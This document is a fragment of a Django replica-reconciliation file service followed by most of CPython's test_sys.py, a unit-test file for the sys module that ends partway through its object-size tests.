mimetype = mimetypes.MimeTypes().guess_type(filepath)[0]
response = HttpResponse()
response['X-Sendfile'] = filepath
response['Content-Type'] = mimetype
response['Content-Disposition'] = 'attachment; filename=%s' % name
return response
@method_decorator(csrf_exempt, name='dispatch')
class GetVector(TemplateView):
def post(self, request):
try:
name = request.POST.get('name')
bucket = request.POST.get('bucket')
bucket_model = Bucket.objects.get(name=bucket)
file = File.objects.get(name=name, bucket=bucket_model)
result = {'node': NODE_NAME, 'vector': file.version, 'timestamp': file.last_modified.timestamp()}
return JsonResponse(result)
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
@method_decorator(csrf_exempt, name='dispatch')
class ReadReconciliation(TemplateView):
def post(self, request):
try:
name = request.POST.get('name')
bucket = request.POST.get('bucket')
vector = int(request.POST.get('vector'))
timestamp = float(request.POST.get('timestamp'))
file = request.FILES['file']
path = os.path.join(ARCHIVE_DIR, bucket, name)
bucket_model = Bucket.objects.get(name=bucket)
file_model = File.objects.get(name=name, bucket=bucket_model)
if vector > file_model.version:
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version = vector
file_model.save()
result = 'File Updation Successful'
elif vector == file_model.version and timestamp > file_model.last_modified.timestamp():
with open(path, 'wb') as f:
for chunk in file.chunks():
f.write(chunk)
file_model.version = vector
file_model.save()
result = 'File Updation Successful'
else:
result = 'File version is higher than the received file'
result = {'vector': file_model.version, 'status': result}
return JsonResponse(result)
except ObjectDoesNotExist:
return HttpResponseNotFound('Invalid File')
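# The update and reconciliation views above share one conflict rule on top of
# the per-file version counter: accept the incoming copy when its vector is
# strictly higher, or when the vectors tie and the incoming timestamp is newer;
# otherwise keep the local copy. A framework-free sketch of that decision
# (function and argument names are illustrative only):
#
#   def should_accept(incoming_vector, incoming_ts, local_vector, local_ts):
#       if incoming_vector > local_vector:
#           return True
#       return incoming_vector == local_vector and incoming_ts > local_ts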
|
test_sys.py
|
import unittest, test.support
from test.script_helper import assert_python_ok, assert_python_failure
import sys, io, os
import struct
import subprocess
import textwrap
import warnings
import operator
import codecs
import gc
import sysconfig
import platform
# count the number of test runs, used to create unique
# strings to intern in test_intern()
numruns = 0
try:
import threading
except ImportError:
threading = None
class SysModuleTest(unittest.TestCase):
def setUp(self):
self.orig_stdout = sys.stdout
self.orig_stderr = sys.stderr
self.orig_displayhook = sys.displayhook
def tearDown(self):
sys.stdout = self.orig_stdout
sys.stderr = self.orig_stderr
sys.displayhook = self.orig_displayhook
test.support.reap_children()
def test_original_displayhook(self):
import builtins
out = io.StringIO()
sys.stdout = out
dh = sys.__displayhook__
self.assertRaises(TypeError, dh)
if hasattr(builtins, "_"):
del builtins._
dh(None)
self.assertEqual(out.getvalue(), "")
self.assertTrue(not hasattr(builtins, "_"))
dh(42)
self.assertEqual(out.getvalue(), "42\n")
self.assertEqual(builtins._, 42)
del sys.stdout
self.assertRaises(RuntimeError, dh, 42)
def test_lost_displayhook(self):
del sys.displayhook
code = compile("42", "<string>", "single")
self.assertRaises(RuntimeError, eval, code)
def test_custom_displayhook(self):
def baddisplayhook(obj):
raise ValueError
sys.displayhook = baddisplayhook
code = compile("42", "<string>", "single")
self.assertRaises(ValueError, eval, code)
def test_original_excepthook(self):
err = io.StringIO()
sys.stderr = err
eh = sys.__excepthook__
self.assertRaises(TypeError, eh)
try:
raise ValueError(42)
except ValueError as exc:
eh(*sys.exc_info())
self.assertTrue(err.getvalue().endswith("ValueError: 42\n"))
def test_excepthook(self):
with test.support.captured_output("stderr") as stderr:
sys.excepthook(1, '1', 1)
self.assertTrue("TypeError: print_exception(): Exception expected for " \
"value, str found" in stderr.getvalue())
# FIXME: testing the code for a lost or replaced excepthook in
# Python/pythonrun.c::PyErr_PrintEx() is tricky.
def test_exit(self):
# call with two arguments
self.assertRaises(TypeError, sys.exit, 42, 42)
# call without argument
with self.assertRaises(SystemExit) as cm:
sys.exit()
self.assertIsNone(cm.exception.code)
rc, out, err = assert_python_ok('-c', 'import sys; sys.exit()')
self.assertEqual(rc, 0)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
# call with integer argument
with self.assertRaises(SystemExit) as cm:
sys.exit(42)
self.assertEqual(cm.exception.code, 42)
# call with tuple argument with one entry
# entry will be unpacked
with self.assertRaises(SystemExit) as cm:
sys.exit((42,))
self.assertEqual(cm.exception.code, 42)
# call with string argument
with self.assertRaises(SystemExit) as cm:
sys.exit("exit")
self.assertEqual(cm.exception.code, "exit")
# call with tuple argument with two entries
with self.assertRaises(SystemExit) as cm:
sys.exit((17, 23))
self.assertEqual(cm.exception.code, (17, 23))
# test that the exit machinery handles SystemExits properly
rc, out, err = assert_python_failure('-c', 'raise SystemExit(47)')
self.assertEqual(rc, 47)
self.assertEqual(out, b'')
self.assertEqual(err, b'')
def check_exit_message(code, expected, **env_vars):
rc, out, err = assert_python_failure('-c', code, **env_vars)
self.assertEqual(rc, 1)
self.assertEqual(out, b'')
self.assertTrue(err.startswith(expected),
"%s doesn't start with %s" % (ascii(err), ascii(expected)))
# test that stderr buffer is flushed before the exit message is written
# into stderr
check_exit_message(
r'import sys; sys.stderr.write("unflushed,"); sys.exit("message")',
b"unflushed,message")
# test that the exit message is written with backslashreplace error
# handler to stderr
check_exit_message(
r'import sys; sys.exit("surrogates:\uDCFF")',
b"surrogates:\\udcff")
# test that the unicode message is encoded to the stderr encoding
# instead of the default encoding (utf8)
check_exit_message(
r'import sys; sys.exit("h\xe9")',
b"h\xe9", PYTHONIOENCODING='latin-1')
def test_getdefaultencoding(self):
self.assertRaises(TypeError, sys.getdefaultencoding, 42)
# can't check more than the type, as the user might have changed it
self.assertIsInstance(sys.getdefaultencoding(), str)
# testing sys.settrace() is done in test_sys_settrace.py
# testing sys.setprofile() is done in test_sys_setprofile.py
def test_setcheckinterval(self):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
self.assertRaises(TypeError, sys.setcheckinterval)
orig = sys.getcheckinterval()
for n in 0, 100, 120, orig: # orig last to restore starting state
sys.setcheckinterval(n)
self.assertEqual(sys.getcheckinterval(), n)
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_switchinterval(self):
self.assertRaises(TypeError, sys.setswitchinterval)
self.assertRaises(TypeError, sys.setswitchinterval, "a")
self.assertRaises(ValueError, sys.setswitchinterval, -1.0)
self.assertRaises(ValueError, sys.setswitchinterval, 0.0)
orig = sys.getswitchinterval()
# sanity check
self.assertTrue(orig < 0.5, orig)
try:
for n in 0.00001, 0.05, 3.0, orig:
sys.setswitchinterval(n)
self.assertAlmostEqual(sys.getswitchinterval(), n)
finally:
sys.setswitchinterval(orig)
def test_recursionlimit(self):
self.assertRaises(TypeError, sys.getrecursionlimit, 42)
oldlimit = sys.getrecursionlimit()
self.assertRaises(TypeError, sys.setrecursionlimit)
self.assertRaises(ValueError, sys.setrecursionlimit, -42)
sys.setrecursionlimit(10000)
self.assertEqual(sys.getrecursionlimit(), 10000)
sys.setrecursionlimit(oldlimit)
@unittest.skipIf(hasattr(sys, 'gettrace') and sys.gettrace(),
'fatal error if run with a trace function')
def test_recursionlimit_recovery(self):
# NOTE: this test is slightly fragile in that it depends on the current
# recursion count when executing the test being low enough so as to
# trigger the recursion recovery detection in the _Py_MakeEndRecCheck
# macro (see ceval.h).
oldlimit = sys.getrecursionlimit()
def f():
f()
try:
for i in (50, 1000):
# Issue #5392: stack overflow after hitting recursion limit twice
sys.setrecursionlimit(i)
self.assertRaises(RuntimeError, f)
self.assertRaises(RuntimeError, f)
finally:
sys.setrecursionlimit(oldlimit)
def test_recursionlimit_fatalerror(self):
# A fatal error occurs if a second recursion limit is hit when recovering
# from a first one.
code = textwrap.dedent("""
import sys
def f():
try:
f()
except RuntimeError:
f()
sys.setrecursionlimit(%d)
f()""")
with test.support.SuppressCrashReport():
for i in (50, 1000):
sub = subprocess.Popen([sys.executable, '-c', code % i],
stderr=subprocess.PIPE)
err = sub.communicate()[1]
self.assertTrue(sub.returncode, sub.returncode)
self.assertIn(
b"Fatal Python error: Cannot recover from stack overflow",
err)
def test_getwindowsversion(self):
# Raise SkipTest if sys doesn't have getwindowsversion attribute
test.support.get_attribute(sys, "getwindowsversion")
v = sys.getwindowsversion()
self.assertEqual(len(v), 5)
self.assertIsInstance(v[0], int)
self.assertIsInstance(v[1], int)
self.assertIsInstance(v[2], int)
self.assertIsInstance(v[3], int)
self.assertIsInstance(v[4], str)
self.assertRaises(IndexError, operator.getitem, v, 5)
self.assertIsInstance(v.major, int)
self.assertIsInstance(v.minor, int)
self.assertIsInstance(v.build, int)
self.assertIsInstance(v.platform, int)
self.assertIsInstance(v.service_pack, str)
self.assertIsInstance(v.service_pack_minor, int)
self.assertIsInstance(v.service_pack_major, int)
self.assertIsInstance(v.suite_mask, int)
self.assertIsInstance(v.product_type, int)
self.assertEqual(v[0], v.major)
self.assertEqual(v[1], v.minor)
self.assertEqual(v[2], v.build)
self.assertEqual(v[3], v.platform)
self.assertEqual(v[4], v.service_pack)
# This is how platform.py calls it. Make sure tuple
# still has 5 elements
maj, min, buildno, plat, csd = sys.getwindowsversion()
def test_call_tracing(self):
self.assertRaises(TypeError, sys.call_tracing, type, 2)
@unittest.skipUnless(hasattr(sys, "setdlopenflags"),
'test needs sys.setdlopenflags()')
def test_dlopenflags(self):
self.assertTrue(hasattr(sys, "getdlopenflags"))
self.assertRaises(TypeError, sys.getdlopenflags, 42)
oldflags = sys.getdlopenflags()
self.assertRaises(TypeError, sys.setdlopenflags)
sys.setdlopenflags(oldflags+1)
self.assertEqual(sys.getdlopenflags(), oldflags+1)
sys.setdlopenflags(oldflags)
@test.support.refcount_test
def test_refcount(self):
# n here must be a global in order for this test to pass while
# tracing with a python function. Tracing calls PyFrame_FastToLocals
# which will add a copy of any locals to the frame object, causing
# the reference count to increase by 2 instead of 1.
global n
self.assertRaises(TypeError, sys.getrefcount)
c = sys.getrefcount(None)
n = None
self.assertEqual(sys.getrefcount(None), c+1)
del n
self.assertEqual(sys.getrefcount(None), c)
if hasattr(sys, "gettotalrefcount"):
self.assertIsInstance(sys.gettotalrefcount(), int)
def test_getframe(self):
self.assertRaises(TypeError, sys._getframe, 42, 42)
self.assertRaises(ValueError, sys._getframe, 2000000000)
self.assertTrue(
SysModuleTest.test_getframe.__code__ \
is sys._getframe().f_code
)
# sys._current_frames() is a CPython-only gimmick.
def test_current_frames(self):
have_threads = True
try:
import _thread
except ImportError:
have_threads = False
if have_threads:
self.current_frames_with_threads()
else:
self.current_frames_without_threads()
# Test sys._current_frames() in a WITH_THREADS build.
@test.support.reap_threads
def current_frames_with_threads(self):
import threading
import traceback
# Spawn a thread that blocks at a known place. Then the main
# thread does sys._current_frames(), and verifies that the frames
# returned make sense.
entered_g = threading.Event()
leave_g = threading.Event()
thread_info = [] # the thread's id
def f123():
g456()
def g456():
thread_info.append(threading.get_ident())
entered_g.set()
leave_g.wait()
t = threading.Thread(target=f123)
t.start()
entered_g.wait()
# At this point, t has finished its entered_g.set(), although it's
# impossible to guess whether it's still on that line or has moved on
# to its leave_g.wait().
self.assertEqual(len(thread_info), 1)
thread_id = thread_info[0]
d = sys._current_frames()
main_id = threading.get_ident()
self.assertIn(main_id, d)
self.assertIn(thread_id, d)
# Verify that the captured main-thread frame is _this_ frame.
frame = d.pop(main_id)
self.assertTrue(frame is sys._getframe())
# Verify that the captured thread frame is blocked in g456, called
# from f123. This is a little tricky, since various bits of
# threading.py are also in the thread's call stack.
frame = d.pop(thread_id)
stack = traceback.extract_stack(frame)
for i, (filename, lineno, funcname, sourceline) in enumerate(stack):
if funcname == "f123":
break
else:
self.fail("didn't find f123() on thread's call stack")
self.assertEqual(sourceline, "g456()")
# And the next record must be for g456().
filename, lineno, funcname, sourceline = stack[i+1]
self.assertEqual(funcname, "g456")
self.assertIn(sourceline, ["leave_g.wait()", "entered_g.set()"])
# Reap the spawned thread.
leave_g.set()
t.join()
# Test sys._current_frames() when thread support doesn't exist.
def current_frames_without_threads(self):
# Not much happens here: there is only one thread, with artificial
# "thread id" 0.
d = sys._current_frames()
self.assertEqual(len(d), 1)
self.assertIn(0, d)
self.assertTrue(d[0] is sys._getframe())
def test_attributes(self):
self.assertIsInstance(sys.api_version, int)
self.assertIsInstance(sys.argv, list)
self.assertIn(sys.byteorder, ("little", "big"))
self.assertIsInstance(sys.builtin_module_names, tuple)
self.assertIsInstance(sys.copyright, str)
self.assertIsInstance(sys.exec_prefix, str)
self.assertIsInstance(sys.base_exec_prefix, str)
self.assertIsInstance(sys.executable, str)
self.assertEqual(len(sys.float_info), 11)
self.assertEqual(sys.float_info.radix, 2)
self.assertEqual(len(sys.int_info), 2)
self.assertTrue(sys.int_info.bits_per_digit % 5 == 0)
self.assertTrue(sys.int_info.sizeof_digit >= 1)
self.assertEqual(type(sys.int_info.bits_per_digit), int)
self.assertEqual(type(sys.int_info.sizeof_digit), int)
self.assertIsInstance(sys.hexversion, int)
self.assertEqual(len(sys.hash_info), 9)
self.assertLess(sys.hash_info.modulus, 2**sys.hash_info.width)
# sys.hash_info.modulus should be a prime; we do a quick
# probable primality test (doesn't exclude the possibility of
# a Carmichael number)
for x in range(1, 100):
self.assertEqual(
pow(x, sys.hash_info.modulus-1, sys.hash_info.modulus),
1,
"sys.hash_info.modulus {} is a non-prime".format(
sys.hash_info.modulus)
)
self.assertIsInstance(sys.hash_info.inf, int)
self.assertIsInstance(sys.hash_info.nan, int)
self.assertIsInstance(sys.hash_info.imag, int)
algo = sysconfig.get_config_var("Py_HASH_ALGORITHM")
if sys.hash_info.algorithm in {"fnv", "siphash24"}:
self.assertIn(sys.hash_info.hash_bits, {32, 64})
self.assertIn(sys.hash_info.seed_bits, {32, 64, 128})
if algo == 1:
self.assertEqual(sys.hash_info.algorithm, "siphash24")
elif algo == 2:
self.assertEqual(sys.hash_info.algorithm, "fnv")
else:
self.assertIn(sys.hash_info.algorithm, {"fnv", "siphash24"})
else:
# PY_HASH_EXTERNAL
self.assertEqual(algo, 0)
self.assertGreaterEqual(sys.hash_info.cutoff, 0)
self.assertLess(sys.hash_info.cutoff, 8)
self.assertIsInstance(sys.maxsize, int)
self.assertIsInstance(sys.maxunicode, int)
self.assertEqual(sys.maxunicode, 0x10FFFF)
self.assertIsInstance(sys.platform, str)
self.assertIsInstance(sys.prefix, str)
self.assertIsInstance(sys.base_prefix, str)
self.assertIsInstance(sys.version, str)
vi = sys.version_info
self.assertIsInstance(vi[:], tuple)
self.assertEqual(len(vi), 5)
self.assertIsInstance(vi[0], int)
self.assertIsInstance(vi[1], int)
self.assertIsInstance(vi[2], int)
self.assertIn(vi[3], ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi[4], int)
self.assertIsInstance(vi.major, int)
self.assertIsInstance(vi.minor, int)
self.assertIsInstance(vi.micro, int)
self.assertIn(vi.releaselevel, ("alpha", "beta", "candidate", "final"))
self.assertIsInstance(vi.serial, int)
self.assertEqual(vi[0], vi.major)
self.assertEqual(vi[1], vi.minor)
self.assertEqual(vi[2], vi.micro)
self.assertEqual(vi[3], vi.releaselevel)
self.assertEqual(vi[4], vi.serial)
self.assertTrue(vi > (1,0,0))
self.assertIsInstance(sys.float_repr_style, str)
self.assertIn(sys.float_repr_style, ('short', 'legacy'))
if not sys.platform.startswith('win'):
self.assertIsInstance(sys.abiflags, str)
@unittest.skipUnless(hasattr(sys, 'thread_info'),
'Threading required for this test.')
def test_thread_info(self):
info = sys.thread_info
self.assertEqual(len(info), 3)
self.assertIn(info.name, ('nt', 'pthread', 'solaris', None))
self.assertIn(info.lock, ('semaphore', 'mutex+cond', None))
def test_43581(self):
# Can't use sys.stdout, as this is a StringIO object when
# the test runs under regrtest.
self.assertEqual(sys.__stdout__.encoding, sys.__stderr__.encoding)
def test_intern(self):
global numruns
numruns += 1
self.assertRaises(TypeError, sys.intern)
s = "never interned before" + str(numruns)
self.assertTrue(sys.intern(s) is s)
s2 = s.swapcase().swapcase()
self.assertTrue(sys.intern(s2) is s)
# Subclasses of string can't be interned, because they
# provide too much opportunity for insane things to happen.
# We don't want them in the interned dict and if they aren't
# actually interned, we don't want to create the appearance
# that they are by allowing intern() to succeed.
class S(str):
def __hash__(self):
return 123
self.assertRaises(TypeError, sys.intern, S("abc"))
def test_sys_flags(self):
self.assertTrue(sys.flags)
attrs = ("debug",
"inspect", "interactive", "optimize", "dont_write_bytecode",
"no_user_site", "no_site", "ignore_environment", "verbose",
"bytes_warning", "quiet", "hash_randomization", "isolated")
for attr in attrs:
self.assertTrue(hasattr(sys.flags, attr), attr)
self.assertEqual(type(getattr(sys.flags, attr)), int, attr)
self.assertTrue(repr(sys.flags))
self.assertEqual(len(sys.flags), len(attrs))
def assert_raise_on_new_sys_type(self, sys_attr):
# Users are intentionally prevented from creating new instances of
# sys.flags, sys.version_info, and sys.getwindowsversion.
attr_type = type(sys_attr)
with self.assertRaises(TypeError):
attr_type()
with self.assertRaises(TypeError):
attr_type.__new__(attr_type)
def test_sys_flags_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.flags)
def test_sys_version_info_no_instantiation(self):
self.assert_raise_on_new_sys_type(sys.version_info)
def test_sys_getwindowsversion_no_instantiation(self):
# Skip if not being run on Windows.
test.support.get_attribute(sys, "getwindowsversion")
self.assert_raise_on_new_sys_type(sys.getwindowsversion())
@test.support.cpython_only
def test_clear_type_cache(self):
sys._clear_type_cache()
def test_ioencoding(self):
env = dict(os.environ)
# Test character: cent sign, encoded as 0x4A (ASCII J) in CP424,
# not representable in ASCII.
env["PYTHONIOENCODING"] = "cp424"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
expected = ("\xa2" + os.linesep).encode("cp424")
self.assertEqual(out, expected)
env["PYTHONIOENCODING"] = "ascii:replace"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout = subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'?')
env["PYTHONIOENCODING"] = "ascii"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = "ascii:"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xa2))'],
stdout=subprocess.PIPE, stderr=subprocess.PIPE,
env=env)
out, err = p.communicate()
self.assertEqual(out, b'')
self.assertIn(b'UnicodeEncodeError:', err)
self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to a non-existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def c_locale_get_error_handler(self, isolated=False, encoding=None):
# Force the POSIX locale
env = os.environ.copy()
env["LC_ALL"] = "C"
code = '\n'.join((
'import sys',
'def dump(name):',
' std = getattr(sys, name)',
' print("%s: %s" % (name, std.errors))',
'dump("stdin")',
'dump("stdout")',
'dump("stderr")',
))
args = [sys.executable, "-c", code]
if isolated:
args.append("-I")
elif encoding:
env['PYTHONIOENCODING'] = encoding
p = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
env=env,
universal_newlines=True)
stdout, stderr = p.communicate()
return stdout
def test_c_locale_surrogateescape(self):
out = self.c_locale_get_error_handler(isolated=True)
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
# replace the default error handler
out = self.c_locale_get_error_handler(encoding=':strict')
self.assertEqual(out,
'stdin: strict\n'
'stdout: strict\n'
'stderr: backslashreplace\n')
# force the encoding
out = self.c_locale_get_error_handler(encoding='iso8859-1')
self.assertEqual(out,
'stdin: surrogateescape\n'
'stdout: surrogateescape\n'
'stderr: backslashreplace\n')
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
@test.support.cpython_only
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
def test_is_finalizing(self):
self.assertIs(sys.is_finalizing(), False)
# Don't use the atexit module because _Py_Finalizing is only set
# after calling atexit callbacks
code = """if 1:
import sys
class AtExit:
is_finalizing = sys.is_finalizing
print = print
def __del__(self):
self.print(self.is_finalizing(), flush=True)
# Keep a reference in the __main__ module namespace, so the
# AtExit destructor will be called at Python exit
ref = AtExit()
"""
rc, stdout, stderr = assert_python_ok('-c', code)
self.assertEqual(stdout.rstrip(), b'True')
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_errors(self):
class BadSizeof:
def __sizeof__(self):
raise ValueError
self.assertRaises(ValueError, sys.getsizeof, BadSizeof())
class InvalidSizeof:
def __sizeof__(self):
return None
self.assertRaises(TypeError, sys.getsizeof, InvalidSizeof())
sentinel = ["sentinel"]
self.assertIs(sys.getsizeof(InvalidSizeof(), sentinel), sentinel)
class FloatSizeof:
def __sizeof__(self):
return 4.5
self.assertRaises(TypeError, sys.getsizeof, FloatSizeof())
self.assertIs(sys.getsizeof(FloatSizeof(), sentinel), sentinel)
class OverflowSizeof(int):
def __sizeof__(self):
return int(self)
self.assertEqual(sys.getsizeof(OverflowSizeof(sys.maxsize)),
sys.maxsize + self.gc_headsize)
with self.assertRaises(OverflowError):
sys.getsizeof(OverflowSizeof(sys.maxsize + 1))
with self.assertRaises(ValueError):
sys.getsizeof(OverflowSizeof(-1))
with self.assertRaises((ValueError, OverflowError)):
sys.getsizeof(OverflowSizeof(-sys.maxsize - 1))
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('4P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
check(get_cell().__code__, size('5i9Pi3P'))
check(get_cell.__code__, size('5i9Pi3P'))
def get_cell2(x):
def inner():
return x
return inner
check(get_cell2.__code__, size('5i9Pi3P') + 1)
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('n2P' + '2nPn' + 8*'n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('n2P' + '2nPn') + 16*struct.calcsize('n2P'))
# dictionary-keyiterator
check({}.keys(), size('P'))
# dictionary-valueiterator
check({}.values(), size('P'))
# dictionary-itemiterator
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2PPP'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# memoryview
check(memoryview(b''), size('Pnin 2P2n2i5P Pn'))
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
